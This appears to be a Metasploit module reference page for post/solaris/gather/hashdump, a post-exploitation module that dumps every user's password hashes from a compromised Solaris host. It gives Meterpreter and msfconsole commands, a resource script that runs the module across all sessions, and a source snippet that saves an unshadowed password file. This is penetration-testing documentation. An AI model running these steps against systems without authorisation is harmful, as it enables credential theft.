Solaris Gather Dump Password Hashes for Solaris Systems - Metasploit


This page contains detailed information about how to use the post/solaris/gather/hashdump metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Solaris Gather Dump Password Hashes for Solaris Systems
Module: post/solaris/gather/hashdump
Source code: modules/post/solaris/gather/hashdump.rb
Disclosure date: -
Last modification time: 2019-03-24 08:11:24 +0000
Supported architecture(s): -
Supported platform(s): Solaris
Target service / protocol: -
Target network port(s): -
List of CVEs: -

Post Module to dump the password hashes for all users on a Solaris System

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/solaris/gather/hashdump

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/solaris/gather/hashdump
msf post(hashdump) > show options
    ... show and set options ...
msf post(hashdump) > set SESSION session-id
msf post(hashdump) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/solaris/gather/hashdump")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the solaris/gather/hashdump post exploitation module looks in the msfconsole:

msf6 > use post/solaris/gather/hashdump

msf6 post(solaris/gather/hashdump) > show info

       Name: Solaris Gather Dump Password Hashes for Solaris Systems
     Module: post/solaris/gather/hashdump
   Platform: Solaris
       Arch: 
       Rank: Normal

Provided by:
  Carlos Perez <[email protected]>

Compatible session types:
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  Post Module to dump the password hashes for all users on a Solaris 
  System

Module Options


This is a complete list of options available in the solaris/gather/hashdump post exploitation module:

msf6 post(solaris/gather/hashdump) > show options

Module options (post/solaris/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the solaris/gather/hashdump post exploitation module:

msf6 post(solaris/gather/hashdump) > show advanced

Module advanced options (post/solaris/gather/hashdump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the solaris/gather/hashdump module can do:

msf6 post(solaris/gather/hashdump) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the solaris/gather/hashdump post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(solaris/gather/hashdump) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

You must run this module as root!


Here is a relevant code snippet related to the "You must run this module as root!" error message:

57:	      # Save pwd file
58:	      upassf = store_loot("solaris.hashes", "text/plain", session, john_file, "unshadowed_passwd.pwd", "Solaris Unshadowed Password File")
59:	      print_good("Unshadowed Password File: #{upassf}")
60:	
61:	    else
62:	      print_error("You must run this module as root!")
63:	    end
64:	
65:	  end
66:	
67:	  def unshadow(pf,sf)

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Carlos Perez <carlos_perez[at]darkoperator.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.